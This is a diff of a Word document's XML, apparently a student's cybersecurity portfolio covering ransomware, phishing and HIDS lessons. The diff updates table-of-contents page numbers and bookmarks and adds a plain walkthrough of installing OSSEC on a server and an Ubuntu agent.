@@ -1220,15 +1280,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>24</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1243,23 +1301,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747833" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154868" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>(BOK) Network Security (week 5-8)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1267,7 +1324,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1275,22 +1331,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747833 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154868 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1298,15 +1351,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>28</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1321,23 +1372,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747834" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154869" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>(BOK) Security Concepts (week 9-10)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1345,7 +1395,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1353,22 +1402,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747834 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154869 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1376,15 +1422,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>28</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1399,16 +1443,16 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747835" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154870" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
                 <w:lang w:val="en-AS"/>
               </w:rPr>
@@ -1416,7 +1460,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1424,7 +1467,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1432,22 +1474,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747835 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154870 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1455,15 +1494,13 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>20</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:t>29</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1655,14 +1692,13 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc113747821"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc114154854"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>INTRODUCTION</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
@@ -1753,7 +1789,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc113747822"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc114154855"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -1980,6 +2016,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">What I realized after all the tutorials that I have been to is that I prefer reading rather than watching tutorials. As the visual tutorials usually do not give me the chance to do things myself. On the other side, services like TryHackMe, Fontys are more practical that I found myself enjoy it more. </w:t>
       </w:r>
     </w:p>
@@ -2001,14 +2038,13 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc113747823"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc114154856"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>(</w:t>
       </w:r>
       <w:r>
@@ -2269,7 +2305,7 @@
           <w:lang w:val="en-AS"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc113747824"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc114154857"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -2312,30 +2348,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Lesson </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="4" w:name="_Toc114154858"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Lesson 1.3</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2383,7 +2403,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc113747825"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc114154859"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -2391,7 +2411,7 @@
         </w:rPr>
         <w:t>Ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2766,6 +2786,7 @@
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Who was responsible for WannaCry?</w:t>
       </w:r>
     </w:p>
@@ -2815,16 +2836,15 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc113747826"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc114154860"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Phishing</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3368,7 +3388,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc113747827"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3401,13 +3420,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="7" w:name="_Toc114154861"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>Lesson 2.2</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3424,6 +3444,7 @@
           <w:lang w:val="en-AS"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc114154862"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -3445,7 +3466,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (HIDS)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4347,7 +4368,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc113747828"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4467,6 +4487,927 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Setting up OSSEC:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9663F1" wp14:editId="67B6A482">
+            <wp:extent cx="5732780" cy="2759075"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
+            <wp:docPr id="26" name="Picture 26"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5732780" cy="2759075"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">First, I git cloned the latest version of OSSEC from </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>https://github.com/ossec/ossec-hids</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Then, I unzip the file then I executed the file named install.sh using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>The picture above shows that I am installing the server version because that is my server interface.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This server will need agents. Therefore, I will redo the same steps on my Ubuntu interface. However, when installing, I should install the agent version of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ossec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B1DA8D6" wp14:editId="17AB2616">
+            <wp:extent cx="5732780" cy="3482975"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
+            <wp:docPr id="27" name="Picture 27"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5732780" cy="3482975"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Now that I have set up OSSEC on server and agent. I could monitor all the requests that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">any agent sends. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After setting up server OSSEC in the server, and agent OSSEC in Ubuntu. We need to link the agent to the server. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>In the server, if we go to /var/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ossec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>manage_agents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, we can add an agent. Let us add our Ubuntu client:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05F65BAE" wp14:editId="7507E925">
+            <wp:extent cx="5732780" cy="2870200"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
+            <wp:docPr id="28" name="Picture 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5732780" cy="2870200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I added the Ubuntu agent and got the key that is unique for it. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now let us stop and start OSSEC </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D88774B" wp14:editId="184D7320">
+            <wp:extent cx="5725160" cy="3021330"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
